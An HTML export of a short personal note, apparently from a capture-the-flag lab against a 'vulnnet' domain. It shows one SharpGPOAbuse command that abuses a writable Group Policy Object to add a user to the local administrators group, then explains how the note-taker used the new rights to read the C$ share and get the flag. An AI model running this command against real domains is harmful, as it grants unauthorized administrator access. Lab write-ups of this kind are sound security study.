<html>
  
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="stylesheet" href="../../../style.css">
    <base target="_parent">
    <title data-trilium-title>GPO</title>
  </head>
  
  <body>
    <div class="content">
       <h1 data-trilium-h1>GPO</h1>

      <div class="ck-content">
        <h2><strong>SharpGPOAbuse</strong></h2><pre><code class="language-text-plain">.\SharpGPOAbuse.exe --AddComputerTask --TaskName "Debug" --Author vulnnet\administrator --Command "cmd.exe" --Arguments "/c net localgroup administrators enterprise-security /add" --GPOName "SECURITY-POL-VN"</code></pre>

        <p>this will add our current user <code>enterprise-security</code> to the administrators
          group, we simply need to do an <code>gpupdate /force</code>

        </p>
        <p>after this, we can perform any administrator actions, but we used this
          to acces the <code>C$</code> directory in samba, to read the system flag</p>
        <p> </p>
      </div>
    </div>
  </body>

</html>